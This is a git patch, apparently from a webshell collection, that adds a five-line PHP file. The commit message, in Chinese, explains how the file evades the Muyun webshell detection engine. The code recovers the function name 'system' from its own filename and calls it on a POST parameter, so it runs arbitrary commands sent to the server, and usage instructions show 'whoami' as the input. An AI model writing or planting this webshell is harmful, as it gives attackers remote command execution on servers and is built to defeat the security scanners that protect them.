From a5b681ccf83d6db169535d45e8c174cf18b665d9 Mon Sep 17 00:00:00 2001
From: tennc <670357+tennc@users.noreply.github.com>
Date: Mon, 22 Aug 2022 22:40:18 +0800
Subject: [PATCH] Create system2022-08-22-3.php
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

from: https://zhuanlan.zhihu.com/p/550150061
__FILE__是PHP的一个魔术常量，它会返回当前执行PHP脚本的完整路径和文件名，我们利用substr()函数逆着截取，就能获得system再利用变量做函数的方式，打断了污点追踪的过程，进行命令执行，也可以成功bypass掉牧云引擎。
usage:
file:xxx.php
post: body==>1=whoami
---
 php/system2022-08-22-3.php | 5 +++++
 1 file changed, 5 insertions(+)
 create mode 100644 php/system2022-08-22-3.php

diff --git a/php/system2022-08-22-3.php b/php/system2022-08-22-3.php
new file mode 100644
index 0000000..4a3b2c5
--- /dev/null
+++ b/php/system2022-08-22-3.php
@@ -0,0 +1,5 @@
+<?php
+//bypass 牧云 文件名需要设置为system
+$filename=substr(__FILE__,-10,6);
+$command=$_POST[1];
+$filename($command);